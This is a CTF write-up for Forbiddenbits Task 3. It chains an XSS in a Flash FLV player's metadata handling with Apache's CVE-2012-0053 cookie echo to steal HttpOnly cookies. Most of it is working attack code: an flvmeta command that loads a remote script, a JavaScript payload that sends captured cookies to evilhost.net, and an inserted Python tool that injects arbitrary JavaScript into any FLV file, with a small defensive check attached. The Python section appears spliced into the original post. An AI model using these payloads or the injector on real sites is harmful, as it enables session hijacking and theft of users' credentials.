Forbiddenbits - Task 3

Task 3 Solution

The task hint, "The truth lays behind the earth", pointed at the Flash-based .flv player.
After decompiling the player we found the vulnerable code: an XSS reachable through the .flv metadata (the width and height fields), which the player concatenates unescaped into a javascript: URL:
ns.onMetaData = function (obj)
{
  // width/height come straight from the FLV's onMetaData AMF data: any type, any content
  metaWidth = obj.width;
  metaHeight = obj.height;
  duration = obj.duration;
  ...
  flv._visible = 1;
  if (jsCallback)
  {
    // No escaping: a width such as '+alert(1)+' closes the quoted argument and
    // runs in the page that embeds the player
    getURL("javascript:flvStart(\'" + metaWidth + "\',\'" + metaHeight + "\')", "");
  } // end if
};
Then we remembered the recent Apache bug in the default 400 error page (http://www.exploit-db.com/exploits/18442/, CVE-2012-0053): when a request header exceeds the server's size limit, Apache 2.2.x before 2.2.22 echoes the offending header, Cookie included, in the error body, so script running on the page can read cookies that HttpOnly was supposed to hide from it. So we made a malicious .flv file with modified metadata to chain the two.

There was a small problem: flvmeta can only add metadata tags to an .flv, so the final file ended up with duplicated width/height entries (the values flvmeta computes from the video stream next to ours). To avoid this we commented out the lines in flvmeta that emit the computed values.
Patch for flvmeta (info.c):
amf_associative_array_add(meta->on_metadata, "lastkeyframetimestamp", amf_nu
...
/*
if (info->video_width > 0)
amf_associative_array_add(meta->on_metadata, "width", amf_number_new(inf
if (info->video_height > 0)
amf_associative_array_add(meta->on_metadata, "height", amf_number_new(in
*/

video_data_rate = ((info->real_video_data_size / 1024.0) * 8.0) / duration;
...

Then we built EVIL.flv, which injects a script tag into the HTML page that embeds the player; that script stole ALL of the user's cookies, HttpOnly ones included. The link to this magic file was sent through the site's feedback form:

http://208.64.122.30/player.swf?flvToPlay=http://kyprizel.net/ctf/TN11.flv&autoStart=true&autoreplay=false&hiddenGui=false&jsCallback=true

PROFIT!

The flvmeta invocation that built EVIL.flv (run with the patched flvmeta above, so this width is the only one left in the file):
./flvmeta -U --add=width="'+(e=document.createElement('script'),e.src='http://kyprizel.net/ctf/pureevilpart3.js',document.body.appendChild(e))+'" EVIL.flv
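As an added example (my code, not the write-up's and not flvmeta's), here is a Python script that does what the patched flvmeta and the --add command above do, but by parsing the FLV, decoding the AMF0 onMetaData array and re-emitting it with width replaced, so the file keeps exactly one metadata tag and no patching of flvmeta is needed. It also carries the defender-side check the player lacks: suspicious_metadata() flags metadata fields that are not plain numbers, which is what a player should verify (or coerce with Number()) before pasting them into a javascript: URL. The sample clip, the file names and the alert payload are constructed for the demonstration.

```python
"""Added example (not the write-up's code): rewrite an FLV's onMetaData tag so that
`width` carries a JavaScript payload, replacing the tag rather than appending a second one."""
import struct
import sys

AMF_NUMBER, AMF_BOOL, AMF_STRING, AMF_ECMA_ARRAY, AMF_END = 0x00, 0x01, 0x02, 0x08, 0x09
TAG_VIDEO, TAG_SCRIPT = 9, 18


def amf_encode(value):
    """AMF0-encode the value types an onMetaData block uses."""
    if isinstance(value, bool):
        return bytes([AMF_BOOL, int(value)])
    if isinstance(value, (int, float)):
        return bytes([AMF_NUMBER]) + struct.pack(">d", float(value))
    if isinstance(value, str):
        raw = value.encode("utf-8")
        return bytes([AMF_STRING]) + struct.pack(">H", len(raw)) + raw
    if isinstance(value, dict):                      # ECMA array: count, key/value pairs, end marker
        out = bytes([AMF_ECMA_ARRAY]) + struct.pack(">I", len(value))
        for key, item in value.items():
            raw = key.encode("utf-8")
            out += struct.pack(">H", len(raw)) + raw + amf_encode(item)
        return out + b"\x00\x00" + bytes([AMF_END])
    raise TypeError("cannot AMF0-encode %r" % type(value))


def amf_decode(buf, pos):
    """Decode one AMF0 value at buf[pos]; return (value, position after it)."""
    kind, pos = buf[pos], pos + 1
    if kind == AMF_NUMBER:
        return struct.unpack(">d", buf[pos:pos + 8])[0], pos + 8
    if kind == AMF_BOOL:
        return bool(buf[pos]), pos + 1
    if kind == AMF_STRING:
        n = struct.unpack(">H", buf[pos:pos + 2])[0]
        return buf[pos + 2:pos + 2 + n].decode("utf-8"), pos + 2 + n
    if kind == AMF_ECMA_ARRAY:
        pos, obj = pos + 4, {}                       # skip the untrusted "approximate count"
        while True:
            n = struct.unpack(">H", buf[pos:pos + 2])[0]
            key, pos = buf[pos + 2:pos + 2 + n].decode("utf-8"), pos + 2 + n
            if n == 0 and buf[pos] == AMF_END:       # empty key + 0x09 ends the array
                return obj, pos + 1
            obj[key], pos = amf_decode(buf, pos)
    raise ValueError("unsupported AMF0 type 0x%02x" % kind)


def make_tag(tag_type, timestamp, payload):
    """Frame payload as an FLV tag (11-byte header) followed by its PreviousTagSize."""
    header = (bytes([tag_type]) + len(payload).to_bytes(3, "big")
              + (timestamp & 0xFFFFFF).to_bytes(3, "big") + bytes([timestamp >> 24 & 0xFF])
              + b"\x00\x00\x00")                     # StreamID, always 0
    return header + payload + struct.pack(">I", 11 + len(payload))


def flv_tags(data):
    """Yield (tag_type, timestamp, payload) for every tag after the FLV header."""
    if data[:3] != b"FLV":
        raise ValueError("not an FLV file")
    pos = struct.unpack(">I", data[5:9])[0] + 4      # DataOffset, then PreviousTagSize0
    while pos + 11 <= len(data):
        size = int.from_bytes(data[pos + 1:pos + 4], "big")
        ts = int.from_bytes(data[pos + 4:pos + 7], "big") | (data[pos + 7] << 24)
        yield data[pos] & 0x1F, ts, data[pos + 11:pos + 11 + size]
        pos += 11 + size + 4


def decode_metadata(payload):
    """Return the onMetaData dict of a script tag, or None for other script data."""
    name, pos = amf_decode(payload, 0)
    return amf_decode(payload, pos)[0] if name == "onMetaData" else None


def inject_payload(flv, js):
    """Return a copy of flv with exactly one onMetaData tag whose width carries js."""
    out, done = bytearray(flv[:struct.unpack(">I", flv[5:9])[0] + 4]), False
    for tag_type, ts, payload in flv_tags(flv):
        meta = decode_metadata(payload) if tag_type == TAG_SCRIPT else None
        if meta is None:
            out += make_tag(tag_type, ts, payload)   # audio/video/other script tags pass through
        elif not done:                               # later duplicate onMetaData tags are dropped
            # The player builds javascript:flvStart('<width>','<height>') by concatenation,
            # so a width of '+(js)+' closes the quote and js runs in the embedding page.
            meta["width"] = "'+(" + js + ")+'"
            out += make_tag(TAG_SCRIPT, ts, amf_encode("onMetaData") + amf_encode(meta))
            done = True
    if not done:
        raise ValueError("no onMetaData tag to rewrite")
    return bytes(out)


def suspicious_metadata(meta):
    """Defender-side check: fields the player hands to JavaScript must be plain numbers."""
    return [k for k in ("width", "height", "duration")
            if k in meta and (isinstance(meta[k], bool) or not isinstance(meta[k], (int, float)))]


def sample_flv():
    """Constructed stand-in for a real clip: header, onMetaData, one dummy video tag."""
    header = b"FLV\x01\x01" + struct.pack(">I", 9) + struct.pack(">I", 0)
    meta = {"duration": 10.0, "width": 320.0, "height": 240.0, "videocodecid": 2.0}
    return (header + make_tag(TAG_SCRIPT, 0, amf_encode("onMetaData") + amf_encode(meta))
            + make_tag(TAG_VIDEO, 0, b"\x12\x00\x00"))


if __name__ == "__main__":
    # usage: python flv_inject.py in.flv EVIL.flv "alert(document.domain)"  (hypothetical names)
    src, dst, js = sys.argv[1:4]
    with open(src, "rb") as f:
        data = f.read()
    with open(dst, "wb") as f:
        f.write(inject_payload(data, js))
```

The string handed to inject_payload is the bare JavaScript expression; the quote-breaking wrapper is added by the script, matching the shape of the --add=width=... value above. Note that Number(obj.width) in the player would have turned the payload into NaN and closed the hole; suspicious_metadata() is the same check expressed on the file side.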


JS pureevilpart3.js (the script loaded by the injected tag):
// Sets ten ~1 KB cookies so that the Cookie header exceeds Apache's request header
// limit; vulnerable Apache 2.2.x then echoes the whole header, HttpOnly cookies
// included, in its 400 Bad Request page, which same-origin XHR can read.
var today = new Date();
var expire = new Date();
expire.setTime(today.getTime() + 2000);   // padding cookies clean themselves up after 2 s
var gotCookie = false;
var padding = "";
for (var j = 0; j <= 1000; ++j)
{
  padding += "A";
}
for (var i = 0; i < 10; ++i)
{
  document.cookie = "z" + i + "=" + padding + "; expires=" + expire.toGMTString() + "; path=/;";
}
function handler()
{
  // readyState is not checked: responseText stays empty until the error body arrives
  if (!gotCookie && this.responseText.length > 1)
  {
    // Apache echoes "Cookie: name=value; ..." in the error page; the match stops at the
    // first ';'. Browsers send earlier-created cookies first (RFC 6265 ordering), so the
    // first one is the victim's original cookie, not our padding. exec() returns an
    // array, which escape() stringifies.
    var text = /(Cookie[^;]*)/i.exec(this.responseText);
    location.href = 'http://evilhost.net/?c=' + escape(text);
    gotCookie = true;
  }
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = handler;
xhr.open("GET", "/httponly.php");   // any same-origin URL will do: the 400 comes from Apache itself
xhr.send();


About this Entry

This page contains a single entry by Юрий Леонычев published on February 13, 2012 3:40 PM.
